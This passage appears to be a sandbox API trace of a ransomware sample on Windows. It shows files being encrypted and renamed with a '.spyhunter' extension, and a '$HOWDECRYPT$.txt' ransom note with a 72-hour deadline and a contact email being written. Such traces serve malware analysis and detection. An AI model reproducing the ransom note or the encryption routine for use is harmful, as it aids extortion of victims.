HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4.spyhunter")) returned 1 [0152.854] GetProcessHeap () returned 0x2c0000 [0152.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.854] GetProcessHeap () returned 0x2c0000 [0152.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0152.854] GetProcessHeap () returned 0x2c0000 [0152.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe0510 | out: hHeap=0x2c0000) returned 1 [0152.854] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248edf0 | out: pbBuffer=0x248edf0) returned 1 [0152.854] GetProcessHeap () returned 0x2c0000 [0152.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0152.854] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ede8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ede8*=0x30) returned 1 [0152.854] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.855] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned 151 [0152.855] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpSrch=".txt") returned 0x0 [0152.855] GetProcessHeap () returned 0x2c0000 [0152.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.855] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248edac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248edac*=0x2d7, lpOverlapped=0x0) returned 1 [0152.882] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffd29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.882] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x248edac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248edac*=0x2d7, lpOverlapped=0x0) returned 1 [0152.882] GetProcessHeap () returned 0x2c0000 [0152.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.883] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.883] WriteFile (in: hFile=0x178, lpBuffer=0x248edec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248edac, lpOverlapped=0x0 | out: lpBuffer=0x248edec*, lpNumberOfBytesWritten=0x248edac*=0x4, lpOverlapped=0x0) returned 1 [0152.883] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248edac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248edac*=0x30, lpOverlapped=0x0) returned 1 [0152.883] CloseHandle (hObject=0x178) returned 1 [0152.883] GetProcessHeap () returned 0x2c0000 [0152.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.883] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.spyhunter") returned 161 [0152.883] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220.spyhunter")) returned 1 [0152.884] GetProcessHeap () returned 0x2c0000 [0152.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.884] GetProcessHeap () returned 0x2c0000 [0152.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0152.884] GetProcessHeap () returned 0x2c0000 [0152.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe0398 | out: hHeap=0x2c0000) returned 1 [0152.885] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248edf0 | out: pbBuffer=0x248edf0) returned 1 [0152.885] GetProcessHeap () returned 0x2c0000 [0152.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0152.885] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ede8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ede8*=0x30) returned 1 [0152.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.885] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned 151 [0152.885] StrStrW (lpFirst="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpSrch=".txt") returned 0x0 [0152.886] GetProcessHeap () returned 0x2c0000 [0152.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.886] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248edac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248edac*=0x680, lpOverlapped=0x0) returned 1 [0152.963] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff980, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.964] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x248edac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248edac*=0x680, lpOverlapped=0x0) returned 1 [0152.964] GetProcessHeap () returned 0x2c0000 [0152.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.964] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.964] WriteFile (in: hFile=0x178, lpBuffer=0x248edec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248edac, lpOverlapped=0x0 | out: lpBuffer=0x248edec*, lpNumberOfBytesWritten=0x248edac*=0x4, lpOverlapped=0x0) returned 1 [0152.964] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248edac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248edac*=0x30, lpOverlapped=0x0) returned 1 [0152.964] CloseHandle (hObject=0x178) returned 1 [0152.964] GetProcessHeap () returned 0x2c0000 [0152.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.964] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9.spyhunter") returned 161 [0152.964] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9.spyhunter")) returned 1 [0152.965] GetProcessHeap () returned 0x2c0000 [0152.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.965] GetProcessHeap () returned 0x2c0000 [0152.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0152.965] GetProcessHeap () returned 0x2c0000 [0152.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe00a8 | out: hHeap=0x2c0000) returned 1 [0152.965] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ede8 | out: pbBuffer=0x248ede8) returned 1 [0152.965] GetProcessHeap () returned 0x2c0000 [0152.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0152.965] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ede0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ede0*=0x30) returned 1 [0152.965] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.966] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned 151 [0152.966] StrStrW (lpFirst="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpSrch=".txt") returned 0x0 [0152.966] GetProcessHeap () returned 0x2c0000 [0152.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.966] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eda4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248eda4*=0x1d7, lpOverlapped=0x0) returned 1 [0152.967] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.967] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1d7, lpNumberOfBytesWritten=0x248eda4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248eda4*=0x1d7, lpOverlapped=0x0) returned 1 [0152.967] GetProcessHeap () returned 0x2c0000 [0152.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.967] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.967] WriteFile (in: hFile=0x178, lpBuffer=0x248ede4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eda4, lpOverlapped=0x0 | out: lpBuffer=0x248ede4*, lpNumberOfBytesWritten=0x248eda4*=0x4, lpOverlapped=0x0) returned 1 [0152.967] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eda4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eda4*=0x30, lpOverlapped=0x0) returned 1 [0152.967] CloseHandle (hObject=0x178) returned 1 [0152.967] GetProcessHeap () returned 0x2c0000 [0152.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.967] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.spyhunter") returned 161 [0152.968] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b.spyhunter")) returned 1 [0152.968] GetProcessHeap () returned 0x2c0000 [0152.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.968] GetProcessHeap () returned 0x2c0000 [0152.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0152.968] GetProcessHeap () returned 0x2c0000 [0152.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc9a38 | out: hHeap=0x2c0000) returned 1 [0152.968] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ede8 | out: pbBuffer=0x248ede8) returned 1 [0152.969] GetProcessHeap () returned 0x2c0000 [0152.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0152.969] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ede0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ede0*=0x30) returned 1 [0152.969] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0152.969] GetProcessHeap () returned 0x2c0000 [0152.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0152.969] GetProcessHeap () returned 0x2c0000 [0152.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45f28 | out: hHeap=0x2c0000) returned 1 [0152.969] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ede0 | out: pbBuffer=0x248ede0) returned 1 [0152.969] GetProcessHeap () returned 0x2c0000 [0152.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0152.969] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248edd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248edd8*=0x30) returned 1 [0152.969] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0152.969] GetProcessHeap () returned 0x2c0000 [0152.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0152.969] GetProcessHeap () returned 0x2c0000 [0152.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f39bd8 | out: hHeap=0x2c0000) returned 1 [0152.969] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ede0 | out: pbBuffer=0x248ede0) returned 1 [0152.969] GetProcessHeap () returned 0x2c0000 [0152.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0152.970] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248edd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248edd8*=0x30) returned 1 [0152.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0152.970] GetProcessHeap () returned 0x2c0000 [0152.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0152.970] GetProcessHeap () returned 0x2c0000 [0152.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8e098 | out: hHeap=0x2c0000) returned 1 [0152.970] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248edd8 | out: pbBuffer=0x248edd8) returned 1 [0152.970] GetProcessHeap () returned 0x2c0000 [0152.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0152.970] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248edd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248edd0*=0x30) returned 1 [0152.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0152.970] GetProcessHeap () returned 0x2c0000 [0152.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0152.970] GetProcessHeap () returned 0x2c0000 [0152.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2ebc0 | out: hHeap=0x2c0000) returned 1 [0152.970] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248edd8 | out: pbBuffer=0x248edd8) returned 1 [0152.970] GetProcessHeap () returned 0x2c0000 [0152.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0152.970] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248edd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248edd0*=0x30) returned 1 [0152.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0152.971] GetProcessHeap () returned 0x2c0000 [0152.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0152.971] GetProcessHeap () returned 0x2c0000 [0152.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c856e0 | out: hHeap=0x2c0000) returned 1 [0152.971] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248edd0 | out: pbBuffer=0x248edd0) returned 1 [0152.971] GetProcessHeap () returned 0x2c0000 [0152.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0152.971] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248edc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248edc8*=0x30) returned 1 [0152.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0152.971] GetProcessHeap () returned 0x2c0000 [0152.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0152.971] GetProcessHeap () returned 0x2c0000 [0152.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85618 | out: hHeap=0x2c0000) returned 1 [0152.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.972] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0152.972] WriteFile (in: hFile=0x178, lpBuffer=0x248ed03*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ee2c, lpOverlapped=0x0 | out: lpBuffer=0x248ed03*, lpNumberOfBytesWritten=0x248ee2c*=0x127, lpOverlapped=0x0) returned 1 [0152.973] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0152.973] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ee2c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ee2c*=0x2ac, lpOverlapped=0x0) returned 1 [0152.973] CloseHandle (hObject=0x178) returned 1 [0152.973] GetProcessHeap () returned 0x2c0000 [0152.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb4f58 | out: hHeap=0x2c0000) returned 1 [0152.973] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 